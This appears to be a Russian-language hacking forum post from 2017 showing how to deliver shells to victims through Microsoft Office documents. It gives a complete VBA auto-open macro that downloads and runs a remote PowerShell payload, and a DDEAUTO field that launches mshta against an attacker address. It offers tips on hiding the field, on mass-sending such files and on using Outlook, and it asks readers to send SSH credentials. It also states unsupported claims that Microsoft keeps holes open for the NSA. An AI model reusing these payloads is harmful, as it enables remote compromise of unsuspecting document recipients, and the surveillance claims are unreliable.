Хайп середины 2017 -> DDE + OldSchool Macros.
GrayHat![](/file/36f3bcfa5f6a1b55b24be.gif)
Я уверена, что каждый тут помнит про макросы в продуктах Microsoft Office, может кто-то помнит об OLE. Смысл прост, VB скрипт помещаем в макрос и отправляем документ жертве. Ничего сложного а приностит результаты по сей день.
А все потому что Microsoft не хочет отключать данные функции. Я уже писала раннее, что это все делается для АНБ и других структур, чтобы им проще было в своей работе. Windows, Office, IE, MSE и многое другое содержат дыры, а когда White Hat придают найденным уязвимостям огласку, они закрываются с релизом новой версии, а другие появляются. А все потому что Windows самая популярная ОС среди рядовых пользователей. Если вы в курсе, то Win 10 раздает данные о вас примерно на 50 адресов серверов MS. Так что тотальная слежка уже давно ведется, скорее конечно это 3 мировая информационная война, но суть Вы поняли. Берегите близких, предупреждайте их.
![](/file/cb80c57521127c8cdaebe.png)
Это настройки по умолчанию. Забавно да? )) А чтобы их найти, это еще надо покапаться, а рядовому пользователю это вообще тяжело. А значит пользователь в 80% случаев жмякнет по всплывающему окну. Специально скачала 2016 офис для этой статьи.
![](/file/001b0c0acd7ef1b239ed8.png)
Знакомая картинка, да? )
![](/file/891163cdbbed65a09d5b7.png)
А после клика появляется шелл, можно делать все, что захотим ) Причем специально сделала разные подсети 192.168.1.0 и 10.0.2.0 Тут не важно откуда жертва получит файл, из внешней сети или локалки.
Хотя макрос совершенно обычный.
Sub Auto_Open()
Dim exec As String
exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://rgho.st/private/6HV4lXWb6/c88987117ccd2e4b9c639a10da043804/payload.txt '))"""
Shell (exec)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Сама суть данного подхода, сгенерировать шел, залить его на обменник и заставить жертву его скачать. А функция автозапуска сделает все остальное. В видео ниже покажу более наглядно. Ладно, хватит про макросы.
Конечно для таких вещей надо создавать документ с поддержкой макросов, а это уже бросается в глаза.
Теперь про DDE
Функция Microsoft Dynamic Data Exchange (DDE) на самом деле не новая. И ее использовали довольно часто на моей памяти. Не скажу, что для плохих целей, а скорее для удобства работы. Эта функция помогает подгружать данные из одного приложения Office в другое. Картинки из презентации автоматом могут подгружаться в документ ворд для отчета. Довольно удобно и те, кто этим часто пользуется даже не парится о предупреждениях. А зря =)
![](/file/ff46a106f93b71b28c377.png)
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.1.12:8080/ZW8yLYaXnHlRN"
Вот такой обычный код вставленный в документ, открывает шелл ) И мы снова можем наблюдать картинку )
![](/file/c3e99b5861238df5d38d2.png)
Самое приятное в этом коде, что идет обфускация и выводится запись запуска MSWord. Я не скрывала формулу, ее можно запихнуть в конец документа и видно не будет. Это не проблема. =) А кто раньше использовал уже DDE сталкивался с проблемой, что выскакивает табличка с надписью cmd.exe, что напрягает =)
![](/file/6a6a7279720fc1775cbe7.png)
Стандартная формула вызова калькулятора -> без обфускации и тп. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
![](/file/0fa19334d8d3443cc2fca.png)
Меня бы сразу напрягла команда, которая содержит cmd.exe ))
У меня закончились аренды всех VDS, а потребности в них сейчас нет, так пишу и работаю на коленках =)) Это все будет работать если lhost в payload прописывать белый внешний IP. Если кто хочет увидеть приколюхи с VDS, скинте в личку ssh данные, я там подшаманю и покажу, как работать на выделенном сервере ) Покажу, как такие вещи рассылать ). Это интересно )
Чуть не забыла!! DDE пашет и в Outlook ))) Так что эксперементируйте и получайте удовольствие ))
Как итог: макросы отключаем вот так! Чтобы никаких уведомлений не было.
![](/file/5c3d8efc15e28395c38cb.png)
А DDE даже не используйте без крайней необходимости. Если сразу нажать отмену, команда не запустится.
В видео будет маленький бонус ) для облегчения написания шелов в DDE.